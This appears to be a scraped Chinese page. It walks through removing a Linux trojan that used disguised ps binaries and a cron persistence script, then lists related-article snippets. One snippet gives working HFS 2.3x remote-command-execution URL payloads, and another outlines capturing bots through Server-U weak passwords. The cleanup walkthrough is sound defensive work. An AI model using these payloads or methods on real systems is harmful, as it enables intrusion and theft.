抓鸡直播截图(南非蚂蚁巨作)

首先登录系统,通过top命令检查系统整体情况

发现第一个进程占用很大cpu资源,肯定有问题

从文件名看出,这不像是一个正常的系统进程

通过进程id判断出执行文件的位置,操作如下:

进一步查看/usr/bin下的文件信息

看第一个文件,非常异常,主要看文件属性

继续通过ps命令查看系统进程,发现

看加壳程序

/usr/bin/dpkgd/ps -ef

看到了吗,这些都是加壳伪装的命令

ps命令看到的其实已经是假象了

然后在看看crontab是否有守护进程信息

发现有异样,看那个kill.sh进程,每3分钟执行一次

询问后得知这个不是人为设置的守护进程

抓内容看看:

看到内容了吗,大家应该能看懂

一个简单的shell

抓网卡,然后设置up状态,所以即使你down了网卡,他也能自动启动

续看看dmesg信息

这是内核队列过大,肉鸡发包导致连接队列沾满爆出的信息

一个开发机器,不可能有这么大流量的

基本信息就是这样

那么下来就开始杀这些木马了

先rm .sshd文件

然后

接着删除这个加壳目录下面的东西

我这里暂时没删除,更改了路径

这样操作后,发现ps命令不能用了

不要紧,难不倒我们

重新安装ps命令即可,通过yum

怎么查ps是哪个包,基础命令很重要

好了,安装完成了,再次ps -ef

发现不一样了,跟之前显示进程的方式不一样了,因为现在的才是真的系统状态

先kill掉这个pid,然后删除之前crontab里面的kill.sh文件

看来kill方法不行,有守护进程,只要进程被关闭,就自动重启了
【博士】南非蚂 2016/3/18 15:02:30

那么我来个这样的命令
【博士】南非蚂 2016/3/18 15:02:45

kill -STOP 4440
【博士】南非蚂 2016/3/18 15:03:21

是不是不再出来了
【博士】南非蚂 2016/3/18 15:03:28

然后继续观察这个脚本
【博士】南非蚂 2016/3/18 15:03:30

【博士】南非蚂 2016/3/18 15:03:56

其实罪魁祸首在这里cp /lib/libkill.so /lib/libkill.so.6

【博士】南非蚂 2016/3/18 15:05:08

现在世界清静了【博士】南非蚂 2016/3/18 15:05:16

但是问题还远远没有结束

【博士】南非蚂 2016/3/18 15:06:59

下面开始做收尾工作,清除后门

【博士】南非蚂 2016/3/18 15:09:59

先通过chartt +i 锁定下/etc/crontab文件

【博士】南非蚂 2016/3/18 15:11:06

接着查找最近生成的可疑文件,然后删除之

【博士】南非蚂 2016/3/18 15:11:20

注意这个命令的用法
【博士】南非蚂 2016/3/18 15:11:31

通过输出可以看到那些是可疑进程

【博士】南非蚂 2016/3/18 15:12:56

在删除的过程中发现一个很有意思的问题

【博士】南非蚂蚁
看看这个指向到了那里
15:15:23
【博士】南非蚂 2016/3/18 15:15:23

很明显,这些文件和指向的文件都一并删除
【博士】南非蚂 2016/3/18 15:17:18

当然,这个也不能留

【博士】南非蚂 2016/3/18 15:17:23

【博士】南非蚂 2016/3/18 15:22:25

/usr/bin下面绝对不能放过可疑文件
【博士】南非蚂 2016/3/18 15:22:31

查找最新文件即可
【博士】南非蚂 2016/3/18 15:23:51

所哟可以文件删除完成,执行最后一个命令
【博士】南非蚂 2016/3/18 15:23:58

kill -9 4440
【博士】南非蚂 2016/3/18 15:24:11

刚才最后的一个木马文件

【博士】南非蚂 2016/3/18 15:26:12

现在在看看是否还会产生新的文件呢,在

【博士】南非蚂 2016/3/18 15:26:29

它回不来了

时间: 2024-10-08 00:34:27

抓鸡直播截图(南非蚂蚁巨作)的相关文章

回顾HFS 2.3x 远程命令执行,抓鸡黑客的“末日”(CVE2014-6287)

去年HFS 2.3x 远程命令执行让很多人遭殃了,尤其是一部分黑客,因为很多批量养鸡的黑客都爱用它,于是乎,辛辛苦苦抓的肉鸡就与人分享了.我们分析漏洞得知由于正则表达式的问题,导致了远程代码的执行. 下面我们来本地测试一下这个漏洞的威力,为什么过了大半年还提它?因为今天随便搜了一下,用这个版本的国内还有很多,涉及到部分"抓鸡黑客"(现在还在用这个版本的估计是小菜),学校等.有趣的是,用hfs的服务器一般都开启了3389,罪恶啊.如下图. google上可以搜到更多的主机. 随便测试几个

HFS 2.3x 远程命令执行(抓鸡黑客末日)

从某论坛看见的,转载部分: 这个程序在国内用的特别多,特别是那些抓肉鸡的黑阔. http://localhost:80/?search==%00{.exec|cmd.} http://localhost:80/search=%00{.exec|cmd.} 注:有些版本search前面是没有?的. 测试部分: 百度搜HFS默认就是2.3x版本,执行echo测试成功: http://localhost:8080/?search==%00{.exec|cmd.exe%20/c%20echo>c:/1.

很早以前的抓鸡资料【转载】

一.21端口 1.简介 这个端口的抓鸡主要用的就是Server-U的漏洞,因为Server-U默认是以SYSTEM权限运行的,所以它就拥有SYSTEM级别的权限,这个权限比administrator还要大,所以你能做的事情比管理员还多. 2.第一步,扫描端口 首先是扫描开放了21端口的机器,这是所有端口入侵的前奏,所有的端口入侵都是先扫端口再入侵的. 扫描完毕之后整理结果,这些我就不多说了. 3.第二步,探测弱口令 探测弱口令的工具,你可以用X-Scan,也可以用Hscan,这两款工具都不错,我

韩老师的乌龟抓鸡

判断两个图片接近的时候用了绝对值的算法 1 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> 2 <html> 3 <head> 4 <title> 004 </title> 5 <script type="text/javascript

国外软件HFS 2.3x 远程命令执行漏洞 (本程序某些YY黑阔大牛抓鸡抓IP工具中使用到本软件)本站教程教习如何梨园远程命令执行。。中国寒龙

这个程序在国内用的特别多,特别是那些抓肉鸡的黑阔. 1 2 http://localhost:80/?search==%00{.exec|cmd.} http://localhost:80/search=%00{.exec|cmd.} 注:有些版本search前面是没有?的. 测试部分:百度搜HFS默认就是2.3x版本,执行echo测试成功: 1 http://localhost:8080/?search==%00{.exec|cmd.exe%20/c%20echo>c:/1.txt%20123

沅陵金融改革 全县上下抢抓“鸡遇”q

上述评论文章认为,解决传统观念上的问题,还得从转变思想上下功夫.当务之急,是要出台好的政策,保证妇女在各方面能取得和男性平等的权益,让"男女平等"."生男生女都一样"的观念逐渐在乡村扎根.在此基础之上,扭转男女比例失调,破除嫁女"待价而沽"等顽疾才会看到希望.(吕春荣) 都是为了成片效果 葡总理科斯塔表示,苏亚雷斯毕生为反对独裁和自由而斗争,他在葡萄牙的历史地位无人可以替代. 同时,加快棚户区改造,全年完成城市棚户区改造4.74万户.农村危房改造

iOS平台基于ffmpeg的视频直播技术揭秘

现在非常流行直播,相信很多人都跟我一样十分好奇这个技术是如何实现的,正好最近在做一个ffmpeg的项目,发现这个工具很容易就可以做直播,下面来给大家分享下技术要点: 首先你得编译出ffmpeg运行所需的静态库,这个百度一下有很多内容,这里我就不多说了,建议可以用Github上的一个开源脚本来编译,简单粗暴有效率. 地址:GitHub - kewlbear/FFmpeg-iOS-build-script: Shell scripts to build FFmpeg for iOS and tvOS

js网站轮播图怎么做如何做?鸡哥教你简单制作效果炫酷

日了狗啦,刚刚鸡哥辛苦码了那么多字全丢了又要重新写,这是第二遍写了...今天鸡哥给小白写个不需要写js原生代码,只需要几个插件和一段通俗易懂得jquery代码就能搞定的轮播图,当然js原生代码写着也不算很繁琐,但是有些浪费时间,更何况很多人并不会用js直接写包括鸡哥,当年在学校还是研究过一段时间js的,当时还独自写了一个轮播图俘获了多少同班妹子的芳心,不过现在是基本废了,这东西要常写,不然忘的很快. 唉,本来还有妹子等着鸡哥呢,我这一大意文章丢了,重新写的话估计来不及了,先打个电话让妹子回家吧~

jmeter编写脚本之抓包实战

以下针对http协议请求 很多网友还在困惑怎么编写jmeter脚本 初学者喜欢使用badboy这个抓包工具,方便的是,可以自动把抓包请求,转化成jmx脚本 但是,包括其他自动抓包工具都有弊端, 就是,抓到的请求太多,而不能准确知道,那些请求是有用的,需要一个一个去试, 还有就是,操作比较麻烦,要么设置代理,要么在其代理浏览器运行... 在这里我给大家介绍下,几种手工抓包工具,做性能测试工程师,需了解真实的请求包 一个http请求,我们重点要关注的有一下几点 1. path:除去域名和端口的后缀部